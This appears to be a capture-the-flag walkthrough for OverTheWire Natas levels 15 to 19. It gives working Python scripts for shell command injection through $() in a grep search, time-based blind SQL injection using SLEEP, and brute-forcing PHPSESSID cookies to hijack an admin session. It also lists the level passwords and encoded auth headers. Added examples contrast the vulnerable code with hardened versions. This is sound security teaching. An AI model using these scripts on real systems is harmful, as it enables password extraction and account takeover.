Natas Level 15 → Level 16
Hint: in a shell script, $() performs command substitution even inside double quotes, so one grep can be nested inside another, for example:

```sh
grep -i "$(grep ^pwd password.txt)"wrong dictionary.txt
```

The shell first runs the inner command, which looks in password.txt for a line starting with pwd. If nothing matches, the substitution expands to nothing and the outer command is effectively grep -i wrong dictionary.txt, which searches dictionary.txt for "wrong" and prints that line when it is found. If the inner grep does match, the outer search term becomes the matched line followed by "wrong", which matches nothing, so the output is empty. This difference can be used to brute-force the password one character at a time. I again used Python; the code is as follows:
```python
import urllib.request
import urllib.parse
import re

url = 'http://natas16.natas.labs.overthewire.org'
headers = {
    'Host': 'natas16.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
# character set the password is drawn from
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# the needle is built as $(grep ^<guess> /etc/natas_webpass/natas17)accounts
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')  # Natas passwords are 32 characters
# a line starting with "accounts" in the output means the inner grep matched nothing
pattern = re.compile(r'\naccounts')
pwd = ''
values = {
    'needle': '',
    'submit': 'Search'
}
for i in range(length):
    for ch in dic:
        needle = n1 + pwd + ch + n2
        print(needle)
        values['needle'] = needle
        data = urllib.parse.urlencode(values)
        r = url + '?' + data
        req = urllib.request.Request(url=r, headers=headers, method='GET')
        response = urllib.request.urlopen(req)
        html = response.read().decode('ascii')
        if pattern.search(html):
            continue  # "accounts" came back: the guessed prefix is wrong
        else:
            pwd += ch  # empty output: the inner grep matched, prefix is correct
            break
print(pwd)
```
username: natas17
password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Passed!
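The weakness behind this level is the pattern of interpolating user input into a shell command string: double quotes stop word splitting but not command substitution. As an added example (not code from this writeup or from the Natas challenge itself), the block below contrasts that pattern with a form that never hands the input to a shell: an allowlist limited to the characters the page's own dic contains, plus an argv list passed straight to grep. The dictionary file, the marker string and the function names are constructed for this demonstration.

```python
import os
import re
import subprocess
import tempfile

# Constructed sample dictionary; not the challenge's dictionary.txt.
SAMPLE_WORDS = "apple\nbanana\nwrong\n"

# Allowlist: the same alphabet the writeup's dic uses, with a length cap.
NEEDLE_RE = re.compile(r'^[A-Za-z0-9]{1,64}$')


def write_dictionary() -> str:
    """Write the constructed word list to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix='.txt')
    with os.fdopen(fd, 'w') as f:
        f.write(SAMPLE_WORDS)
    return path


def search_vulnerable(needle: str, path: str) -> str:
    """Interpolates the needle into a double-quoted shell string.

    This is the shape the Level 15 page describes: $() is still expanded
    inside "...", so the needle is treated as shell syntax, not as text.
    """
    cmd = f'grep -i "{needle}" {path}'
    r = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return r.stdout


def search_hardened(needle: str, path: str) -> str:
    """Validate, then run grep without any shell.

    1. The allowlist rejects anything outside [A-Za-z0-9], so neither shell
       nor grep regex metacharacters can reach the command.
    2. The argv list is passed to grep directly: no shell parses it, so
       $(...) would be searched for literally even without step 1.
    3. '--' ends option parsing, so a needle starting with '-' cannot
       become a grep option.
    """
    if not NEEDLE_RE.match(needle):
        raise ValueError('needle contains disallowed characters')
    r = subprocess.run(['grep', '-i', '--', needle, path],
                       capture_output=True, text=True)
    return r.stdout


if __name__ == '__main__':
    path = write_dictionary()
    try:
        marker = '$(printf banana)'  # constructed, harmless substitution
        print('vulnerable, plain needle :', repr(search_vulnerable('wrong', path)))
        print('vulnerable, substitution :', repr(search_vulnerable(marker, path)))
        print('hardened,   plain needle :', repr(search_hardened('wrong', path)))
        try:
            search_hardened(marker, path)
        except ValueError as e:
            print('hardened,   substitution : rejected:', e)
    finally:
        os.unlink(path)
```

The vulnerable form returns the "banana" line for the marker needle because the shell ran printf before grep ever saw the argument; the hardened form rejects the same input at the allowlist, and even with the allowlist removed the argv form would search for the literal text "$(printf banana)" and return nothing.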
Natas Level 16 → Level 17
Hint: comparing the source with the previous level shows that the output has been commented out. Injection against a MySQL database generally takes one of three approaches:
- Injection with visible output: the server returns some information
- Time-based blind injection: the server returns nothing, but a carefully constructed SQL statement lets you infer information from how long the server takes to respond
- Error-based injection (omitted)
The previous level was injection with visible output; this level is time-based blind injection.
I wrote a script in Python; the code is as follows:
```python
import requests

url = 'http://natas17.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas17.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas17.natas.labs.overthewire.org',
    'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas17.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
# character set the password is drawn from
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# the username becomes: natas18" AND BINARY password LIKE "<guess>%" AND SLEEP(10)#
# the server only sleeps when the guessed prefix is right
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')  # Natas passwords are 32 characters
pwd = ''
for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        print(name)
        data = {'username': name}
        res = requests.post(url, data=data, headers=headers)
        time = res.elapsed.total_seconds()
        print(time)
        if time > 10:  # the delay fired, so this character is correct
            pwd += ch
            break
print(pwd)
```
username: natas18
password: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
Note: because of network latency it is best to use a fairly long delay. I set SLEEP(10), ten seconds; with a shorter one the result comes out wrong.
Passed!
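The mitigation is the same whichever of the three injection styles above is in play: the username must not be concatenated into the SQL statement. The following added example (mine, not code from this writeup) uses Python's sqlite3 module as a stand-in for the MySQL backend, with a constructed users table and a constructed password, and shows that the same probe string either rewrites the query (string concatenation) or is compared as one literal username (placeholder binding). SQLite delimits strings with single quotes and has no SLEEP() or BINARY, so the probe uses single quotes and omits the timing clause; the structural point is identical, and with the bound form there is no clause for a delay to attach to.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the challenge's users table."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, password TEXT)')
    # constructed credentials, not the real natas18 password
    conn.execute("INSERT INTO users VALUES ('natas18', 'examplepassword123')")
    conn.commit()
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """The username is pasted into the statement text.

    A quote inside the value closes the string literal early, so the rest of
    the value becomes SQL: the query's structure now depends on user input.
    """
    query = f"SELECT 1 FROM users WHERE username='{username}'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn: sqlite3.Connection, username: str) -> bool:
    """The username is bound to a placeholder.

    The driver sends the value separately from the statement, so the whole
    string, quotes and all, is compared as one username and never parsed.
    """
    query = "SELECT 1 FROM users WHERE username=?"
    return conn.execute(query, (username,)).fetchone() is not None


if __name__ == '__main__':
    conn = make_db()
    # a probe that asks a yes/no question about the password, one prefix at a time
    probe_true = "natas18' AND password LIKE 'e%"
    probe_false = "natas18' AND password LIKE 'z%"
    for label, fn in (('concatenated', user_exists_vulnerable), ('bound', user_exists_safe)):
        print(f"{label:12} plain   : {fn(conn, 'natas18')}")
        print(f"{label:12} probe e%: {fn(conn, probe_true)}")
        print(f"{label:12} probe z%: {fn(conn, probe_false)}")
```

With concatenation the two probes return different answers, which is exactly the one-bit oracle the writeup's script turns into a password; with the bound parameter both probes return False because no user named "natas18' AND password LIKE 'e%" exists, and the database never evaluated a LIKE at all.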
Natas Level 17 → Level 18
Hint: reading the source shows that the password is only revealed when logged in as administrator, and the authentication state is kept in the $_SESSION variable, so we can pose as the administrator through session hijacking. Session hijacking needs the session_id first; once we have it we can log in as the administrator. So the task is to obtain the session_id. Capturing the traffic with Burp shows a PHPSESSID field in the cookies; this is what the server uses to identify the user, so if we obtain the administrator's PHPSESSID we can log in as administrator.
The PHPSESSID value turns out to be purely numeric, and the source contains $maxid=640, meaning the session_id is at most 640, so we simply brute-force it. The Python code is as follows:
```python
import requests
import re

url = 'http://natas18.natas.labs.overthewire.org/'
headers = {
    'Host': 'natas18.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
# any session that is not the admin's shows this text
pattern = re.compile(r'You are logged in as a regular user')
for i in range(640):  # $maxid=640 in the source
    val = str(i)
    cookies = {'PHPSESSID': val}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print(val)
    else:
        print('session_id=' + val)
        print(res.content.decode('ascii'))
        break
```
Running the script finds the administrator's session_id=119 together with the password for the next level
username: natas19
password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Passed!
Natas Level 18 → Level 19
Hint: this level's source is the same as the previous one, but the PHPSESSID is no longer purely numeric. Trying a few times reveals a pattern: the first 7 characters are digits, always of the form 3xxxxxx, so start brute-forcing from 3000000; the remaining characters are the fixed string 'd61646d696e'. So brute-force it as before. It takes a while, so go get a coffee. The code is as follows:
```python
import requests
import re

url = 'http://natas19.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas19.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are an admin')
s_val = 3000000  # first 7 digits of the PHPSESSID; the admin's are 3238312
while True:
    session_id = str(s_val) + 'd61646d696e'  # fixed suffix observed in every cookie
    print('PHPSESSID: ' + session_id)
    cookies = {'PHPSESSID': session_id}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print('session_id=' + session_id)
        print(res.content.decode('ascii'))
        break
    s_val += 1
```
When the script finishes, session_id=3238312d61646d696e turns out to be the administrator's session_id
username: natas20
password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
Passed!